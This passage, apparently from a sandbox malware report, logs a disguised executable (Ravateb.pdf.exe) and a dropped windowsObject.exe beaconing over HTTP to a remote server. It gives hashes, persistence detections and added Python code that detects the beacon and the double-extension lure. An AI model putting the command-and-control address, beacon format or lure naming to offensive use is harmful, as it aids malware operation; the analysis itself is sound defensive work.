          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          9 | 192.168.2.4 | 49731 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:34.735253096 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ILKGCoiLjVhLcClFKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:35.607688904 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:35 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          10 | 192.168.2.4 | 49732 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:40.737560034 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ELVHCoiLjVhLcClSKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:41.610940933 CET | 160 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:41 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          11 | 192.168.2.4 | 49733 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:47.190242052 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:47.416965961 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:47.729353905 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:49.117772102 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:49 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          12 | 192.168.2.4 | 49734 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:38:54.250559092 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ZLYPCoiLjZhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:38:55.144752979 CET | 160 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:38:55 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          13 | 192.168.2.4 | 49735 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:39:00.281969070 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer QLJXCoiLjMhLcClEKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:39:01.175746918 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:39:01 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          14 | 192.168.2.4 | 49736 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:39:06.317131996 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ELJNCoiLjYhLcClXKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:39:07.195157051 CET | 160 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:39:07 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          15 | 192.168.2.4 | 49737 | 89.46.233.239 | 10443 | 7368 | C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Timestamp | Bytes transferred | Direction | Data
          Mar 12, 2025 17:39:12.409554958 CET | 521 | OUT | GET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer RLHGCoiLjZhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:39:13.351949930 CET | 1236 | IN | HTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:39:13 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]
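
The eight sessions above are one request repeated: GET /resource over cleartext HTTP to 89.46.233.239 on port 10443, a fresh source port each time, roughly six seconds apart, with an Authorization: Bearer value that changes on every poll while 36 of its 41 characters stay fixed, and the same 2739-byte "BrightFuture Digital" page coming back (session 11 re-sends the identical request three times within half a second before the reply arrives). The Python below is an added example, not code from the Joe Sandbox report or from the sample: it turns those observations into checks over request records constructed from the timestamps, source ports and bearer values printed above (first request of each session). The jitter and fixed-character thresholds and the ports treated as normal for cleartext HTTP are assumptions chosen for illustration.

```python
"""Beacon indicators in the windowsObject.exe HTTP sessions above.

Added example, not code from the Joe Sandbox report or from the sample.
Request records are constructed from sessions 8-15 on this page; the
thresholds (max_cv, min_fixed) and the "expected" port list are assumptions.
"""
from datetime import datetime
from statistics import mean, pstdev

# Constructed from the session table above: (timestamp, source port, bearer token).
# Every request is "GET /resource HTTP/1.1" from 192.168.2.4 to 89.46.233.239:10443.
SAMPLE_REQUESTS = [
    ("2025-03-12 17:38:28.736511", 49730, "MLHZCoiLjGhLcClIKQVYFAFNVW0oDBQJTSkJEExQQ"),
    ("2025-03-12 17:38:34.735253", 49731, "ILKGCoiLjVhLcClFKQVYFAFNVW0oDBQJTSkJEExQQ"),
    ("2025-03-12 17:38:40.737560", 49732, "ELVHCoiLjVhLcClSKQVYFAFNVW0oDBQJTSkJEExQQ"),
    ("2025-03-12 17:38:47.190242", 49733, "ULGLCoiLjEhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ"),
    ("2025-03-12 17:38:54.250559", 49734, "ZLYPCoiLjZhLcClVKQVYFAFNVW0oDBQJTSkJEExQQ"),
    ("2025-03-12 17:39:00.281969", 49735, "QLJXCoiLjMhLcClEKQVYFAFNVW0oDBQJTSkJEExQQ"),
    ("2025-03-12 17:39:06.317131", 49736, "ELJNCoiLjYhLcClXKQVYFAFNVW0oDBQJTSkJEExQQ"),
    ("2025-03-12 17:39:12.409554", 49737, "RLHGCoiLjZhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ"),
]
DST_PORT = 10443


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")


def beacon_cadence(timestamps):
    """Mean gap between consecutive requests and its coefficient of variation
    (stdev / mean). A CV close to 0 is what a fixed sleep loop produces."""
    ts = sorted(_parse(t) for t in timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mu = mean(gaps)
    return mu, pstdev(gaps) / mu


def token_template(tokens):
    """Positional mask over the observed tokens: the literal character where
    every token agrees, '?' where any differ. Real bearer tokens share nothing
    positionally; a mostly fixed mask means the 'token' is a structured field."""
    if len({len(t) for t in tokens}) != 1:
        raise ValueError("tokens differ in length; no positional template")
    return "".join(col[0] if len(set(col)) == 1 else "?" for col in zip(*tokens))


def matches_template(token, template):
    """True when token has the template's length and agrees on every literal."""
    return len(token) == len(template) and all(
        p == "?" or p == c for p, c in zip(template, token)
    )


def assess(requests, dst_port, cleartext=True, max_cv=0.15, min_fixed=0.5):
    """Collect beacon indicators for one client/server pair."""
    findings = []
    if cleartext and dst_port not in (80, 8080):          # assumed "expected" ports
        findings.append(f"cleartext HTTP on non-standard port {dst_port}")
    ports = [p for _, p, _ in requests]
    if len(set(ports)) == len(ports):                      # no connection reuse
        findings.append("new TCP connection per request (distinct source ports)")
    if len(requests) >= 5:
        mu, cv = beacon_cadence([t for t, _, _ in requests])
        if cv <= max_cv:
            findings.append(f"regular cadence: ~{mu:.1f}s, jitter cv={cv:.2f}")
    template = token_template([tok for _, _, tok in requests])
    fixed = 1 - template.count("?") / len(template)
    if fixed >= min_fixed:
        findings.append(f"structured bearer token: {fixed:.0%} fixed, mask {template}")
    return findings


if __name__ == "__main__":
    for line in assess(SAMPLE_REQUESTS, DST_PORT):
        print(line)
```

On the records above, `assess` reports all four indicators: cleartext HTTP on 10443, a new connection per poll, a ~6.2 s cadence with about 6 % jitter, and a bearer mask of the form `?L??CoiLj?hLcCl?KQVYFAFNVW0oDBQJTSkJEExQQ` (only positions 0, 2, 3, 9 and 15 vary). The mask is the piece worth keeping: it lets a proxy or IDS match future polls from this client without relying on the IP or the fixed path.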


          [Charts omitted: CPU usage (0-100 %) and memory usage (0-40 MB) over the first ~100 s of execution, with per-process links, and the behaviour distribution across File, Registry and Network activity]

          Target ID: 0
          Start time: 12:37:08
          Start date: 12/03/2025
          Path: C:\Users\user\Desktop\Ravateb.pdf.exe
          Wow64 process (32bit): false
          Commandline: "C:\Users\user\Desktop\Ravateb.pdf.exe"
          Imagebase: 0x9c0000
          File size: 82'944 bytes
          MD5 hash: E7D52EF521B8CD0B405575C185D64033
          Has elevated privileges: true
          Has administrator privileges: true
          Programmed in: C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation: low
          Has exited: true

          Target ID: 8
          Start time: 12:37:29
          Start date: 12/03/2025
          Path: C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Wow64 process (32bit): false
          Commandline: C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -time 6.9.2018
          Imagebase: 0xf30000
          File size: 22'016 bytes
          MD5 hash: 2BC1C670A5C179E58F6C33C7469B9D98
          Has elevated privileges: false
          Has administrator privileges: false
          Programmed in: C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 46%, ReversingLabs
          Reputation: low
          Has exited: false
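
The two process records above give the host-side artefacts: a double-extension lure on the desktop running elevated, and a separate 22,016-byte binary with a different MD5 started from a WindowsObject folder under %APPDATA%\Microsoft with a -time argument and still running when the analysis ended. The Python below is an added example, not code from the Joe Sandbox report or the sample: it encodes the double-extension and user-writable-location checks as a triage pass over process records constructed from those two entries. The extension sets and the path markers are assumptions to tune per environment, not a vendor rule.

```python
"""Host-side triage of the two process records above.

Added example, not code from the Joe Sandbox report. The records are
constructed from the Target 0 and Target 8 entries on this page; DOC_EXTS,
EXEC_EXTS and WRITABLE_MARKERS are assumptions, not a vendor rule set.
"""
import ntpath

# Constructed from the process table above.
SAMPLE_PROCESSES = [
    {"target": 0,
     "path": r"C:\Users\user\Desktop\Ravateb.pdf.exe",
     "cmdline": r'"C:\Users\user\Desktop\Ravateb.pdf.exe"',
     "md5": "E7D52EF521B8CD0B405575C185D64033",
     "elevated": True},
    {"target": 8,
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe",
     "cmdline": r"C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -time 6.9.2018",
     "md5": "2BC1C670A5C179E58F6C33C7469B9D98",
     "elevated": False},
]

# Assumed: inner extensions that make a file look like a document, and outer
# extensions Windows will execute.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd"}
# Assumed per-user writable roots; compared case-insensitively.
WRITABLE_MARKERS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")


def double_extension(path):
    """Return (inner, outer) when the basename ends in <doc ext>.<exec ext>,
    else None. Case-insensitive, so 'Ravateb.PDF.Exe' is caught as well."""
    parts = ntpath.basename(path).lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXEC_EXTS and parts[-2] in DOC_EXTS:
        return parts[-2], parts[-1]
    return None


def in_writable_location(path):
    """True when the image lives under a per-user writable directory."""
    low = path.lower()
    return any(marker in low for marker in WRITABLE_MARKERS)


def evaluate(proc):
    """Findings for one process record, in a stable order."""
    findings = []
    dbl = double_extension(proc["path"])
    if dbl:
        findings.append(f"double extension .{dbl[0]}.{dbl[1]}")
        if proc["elevated"]:
            findings.append("double-extension binary running elevated")
    if in_writable_location(proc["path"]):
        findings.append("image in user-writable profile directory")
    return findings


def triage(procs):
    """Map target id -> findings, keeping only processes that raised one."""
    result = {}
    for proc in procs:
        findings = evaluate(proc)
        if findings:
            result[proc["target"]] = findings
    return result


if __name__ == "__main__":
    for target, findings in triage(SAMPLE_PROCESSES).items():
        print(target, findings)
```

Both records are flagged: Target 0 for the .pdf.exe name (and for running elevated with it), Target 8 for executing out of AppData\Roaming. The path check is the one worth widening in practice: the command line for Target 8 spells the path as C:\users while the image path says C:\Users, so any join between the two fields has to be case-insensitive, which is why the checks lower-case before comparing.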

          Executed Functions

          Strings
          Memory Dump Source
